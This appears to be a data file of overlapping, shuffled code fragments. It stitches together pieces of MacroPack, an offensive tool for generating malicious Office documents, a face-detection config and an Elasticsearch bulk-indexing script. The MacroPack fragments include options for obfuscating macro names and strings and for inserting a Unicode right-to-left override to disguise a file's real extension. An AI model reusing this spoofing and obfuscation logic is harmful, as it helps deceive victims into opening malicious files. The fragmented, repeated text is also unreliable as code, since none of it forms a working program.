VERSION, LOGLEVEL if sys.platform", "None): logging.error(\" [!] You need to provide an output file!", "Use --listformats to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2)", "if sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin =", "pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import", "ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen", "% mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget", "payloadBuilder.run() if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run", "from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro", "sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile):", "opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile =", "mode (pro features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check", "right payload builder if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE ==", "= int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon = arg", "import ComGenerator from modules.web_server import ListenServer from modules.Wlisten_server import WListenServer", "elif opt == \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg)", "MP_TYPE == \"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running in community", "# Edit outputfile name to spoof extension if unicodeRtlo option", "from common import utils, mp_session, help from common.utils import MSTypes", "sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers", "(\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings =", "MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output", "if os.name == 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\",", "is None and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is None):", "fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for", "object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession", "file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file:", "elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in", "Separate document path and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\"", "logging.info(\" [-] Temporary working dir: %s\" % working_directory) if not", "\" % fileExtension) # Append unicode RTLO to file name", "import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from", "to make Termcolor work on Windows too init() WORKING_DIR =", "else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\",", "from common.definitions import VERSION, LOGLEVEL if sys.platform == \"win32\": try:", "BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls'", "elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten", "True mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or opt==", "= arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg)", "that output file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\"", "to file name fileName += '\\u202e' # Append extension to", "if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web server", "arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen", "caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\" [+]", "import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common import utils,", "and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s", "from modules.web_server import ListenServer from modules.Wlisten_server import WListenServer from modules.payload_builder_factory", "sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError:", "mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings =", "getopt import logging import shutil import psutil from modules.com_run import", "opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif", "std input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close()", "mpSession.communityMode: logging.warning(\" [!] Running in community mode (pro features not", "%s is not a supported extension. Use --listformats to view", "mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does not end", "# Needed to avoid some weird race condition logging.info(\" [-]", "== \"win32\": mpSession.runVisible = True elif opt == \"--force-yes\": mpSession.forceYes", "input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format", "mpSession.unicodeRtlo) # Separate document path and extension (fileName, fileExtension) =", "file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create", "supported extension. Use --listformats to view supported MacroPack formats.\" %", "opt== \"--input-file\": mpSession.fileInput = arg elif opt == \"-e\" or", "input args if mpSession.fileInput is None: # Argument not supplied,", "in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else:", "elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\":", "= WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\") except", "True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames =", "help.getToolPres() def main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize", "if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for %s.", "Extension %s \" % fileExtension) # Append unicode RTLO to", "'green')) logging.info(\" [+] Preparations...\") # check input args if mpSession.fileInput", "binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!]", "\"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt", "= True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares =", "mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\":", "if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run com", "\"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform", "opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction =", "mpSession.fileInput = arg elif opt == \"-e\" or opt== \"--embed\":", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls' if os.name", "input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else:", "extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder;" ]
[ "<reponame>binhmuc/faced import os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288", "MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9", "= os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE", "os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET =", "\"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE = 50", "import os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET", "os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE =" ]
[ "es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name =", "logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if document_type in", "delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config,", "logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name,", "in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name,", "class ElasticSearchException(Exception): pass # Init Elasticsearch and test connection def", "index_name, file_path, logger) logger.info(\"Creating index aliases and deleting old indices...\")", "get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED", "config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}'", "= os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name))", "BrAPI extraction and Elasticsearch document transformation' ' before trying to", "document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType':", "import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template", "bulk_dir) sources = config['sources'] for (source_name, source) in sources.items(): source_bulk_dir", "logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index", "+ '-d*', params={'h': 'index'}) index_names = list(map(lambda i: i['index'], indices))", "= dict() logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time())", "= source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir,", "json bulk folder found in ' + bulk_dir) sources =", "alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name))", "directory: \\'{}\\'.\\n' 'Please make sure you have run the BrAPI", "get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config", "cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e:", "list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types", "# Load json bulk files into elasticsearch import json import", "{'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] =", "= elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node \"{}\"", "file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating", "try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or", "os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with", "in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception", "template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger):", "logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time()) for document_type", "'-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template", "load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\"", "body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\"", "index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases", "Elasticsearch documents.\\n\" \"=> Check the logs ({}) for more details.\"", "index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path in", "= load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict()", "from etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger,", "replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type,", "def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger):", "main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not", "def create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' +", "bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file", "get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init", "extraction and Elasticsearch document transformation' ' before trying to launch", "base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] =", "create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name", "run the BrAPI extraction and Elasticsearch document transformation' ' before", "'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name,", "folder found in ' + bulk_dir) sources = config['sources'] for", "+ bulk_dir) sources = config['sources'] for (source_name, source) in sources.items():", "mapping...\") timestamp = int(time.time()) for document_type in document_types: base_index_name =", "to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url))", "pass # Init Elasticsearch and test connection def init_es_client(url, logger):", "create_template(es_client, load_config, document_type, base_index_name, logger) index_name = base_index_name + '-d'", "or directory: \\'{}\\'.\\n' 'Please make sure you have run the", "in bulk_files: if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type]", "for document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'],", "base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h':", "file_path, logger) logger.info(\"Creating index aliases and deleting old indices...\") for", "transformation' ' before trying to launch the transformation process.' .format(source_bulk_dir))", "in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client,", "'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger", "index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names def", "document transformation' ' before trying to launch the transformation process.'", "document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index,", "template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern,", "import time import traceback import elasticsearch from etl.common.store import list_entity_files", "all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types", "e return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def", "import elasticsearch from etl.common.store import list_entity_files from etl.common.utils import get_folder_path,", "base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading", "def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing", "index_by_document = dict() logger.info(\"Preparing index with template mapping...\") timestamp =", "check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path)", "base_index_name template_pattern = base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if", "indexing...\") for document_type, file_path in bulk_files: if document_type in index_by_document:", "index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents", "of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as", "Exception('No json bulk folder found in ' + bulk_dir) sources", "such file or directory: \\'{}\\'.\\n' 'Please make sure you have", "url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable on", "es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node", "= base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type]", "def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info()", "init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if", "source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file =", "index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and deleting", "= get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose'])", "\"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name =", "bulk_files: if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client,", "not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n'", "Load json bulk files into elasticsearch import json import os", "index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name", "list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template class", "index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name))", "{'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger)", "logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path", "= int(time.time()) for document_type in document_types: base_index_name = replace_template( load_config['index-template'],", "document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path,", "es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url']))", "logger.info(\"Creating index aliases and deleting old indices...\") for document_type, (base_index_name,", "os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n' 'Please", "({}) for more details.\" .format(source_name, log_file)) def main(config): log_dir =", "base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern = base_index_name", "i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir):", "bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types')", "documents.\\n\" \"=> Check the logs ({}) for more details.\" .format(source_name,", "\"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings':", "(base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices", "except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease", "logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check", "raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name))", "log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file,", "\"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file:", "base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name +", "base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if", "return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch", "found in ' + bulk_dir) sources = config['sources'] for (source_name,", "= config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch", "= 'template_elixir_' + base_index_name template_pattern = base_index_name + '-d*' mapping", "base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index", "logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def", "dict() logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time()) for", "logger) logger.info(\"Creating index aliases and deleting old indices...\") for document_type,", "check your configuration'.format(url)) raise e return es_client def check_error(response): if", "info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable", "mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body", "source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name", "file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name,", "logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not", "= get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger)", "import get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass #", "elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node \"{}\" of", "document_type, base_index_name, logger) index_name = base_index_name + '-d' + str(timestamp)", "logs ({}) for more details.\" .format(source_name, log_file)) def main(config): log_dir", "more details.\" .format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir", "into elasticsearch import json import os import time import traceback", "= es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template \"{}\" on", "'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name,", "return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client,", "i: i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir,", "# Init Elasticsearch and test connection def init_es_client(url, logger): es_client", "log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading", "= document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with template mapping...\")", "logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the logs ({})", "logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index", "if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def", "indices...\") for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name,", "\"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping} if 'index-settings'", "transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files))", "config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir,", "on \"{}\".\\nPlease check your configuration'.format(url)) raise e return es_client def", "\"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms'))", "logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path,", "index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating", "check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating", "file or directory: \\'{}\\'.\\n' 'Please make sure you have run", "'index'}) index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names", "index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\"", "create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name,", "\"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name):", "unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e return es_client", "json bulk files into elasticsearch import json import os import", "source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name,", "base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name) for old_index in", "index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type,", "file_path in bulk_files: if document_type in index_by_document: base_index_name, index_name =", "'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the", "trying to launch the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir))", "template_body = {'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config:", "= base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping:", "the logs ({}) for more details.\" .format(source_name, log_file)) def main(config):", "+ '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating", "load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into", "es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern", "= es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name", "template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings']", "timestamp = int(time.time()) for document_type in document_types: base_index_name = replace_template(", "in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source, config, source_bulk_dir, log_dir)", "try: info = es_client.info() logger.debug('Connected to node \"{}\" of cluster", "{}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED", "bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json", "logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client =", "documents indexing \"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' +", "'{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such", "log_file)) def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk')", "on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping}", "index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices =", "mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template \"{}\"", "get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch", "es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda i: i['index'],", "or all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index", "'')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the logs", "Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {}", "old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc())", "logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message',", "e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url))", "int(time.time()) for document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source':", "def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index", "have run the BrAPI extraction and Elasticsearch document transformation' '", "= config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise", "indexing \"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name", "load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name,", "check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias", "es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path,", "for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices", "recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client", "on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error:", ".format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types =", "elasticsearch import json import os import time import traceback import", "'-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name", "index aliases and deleting old indices...\") for document_type, (base_index_name, index_name)", "bulk folder found in ' + bulk_dir) sources = config['sources']", "for document_type, file_path in bulk_files: if document_type in index_by_document: base_index_name,", "+ source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger =", "= create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'],", 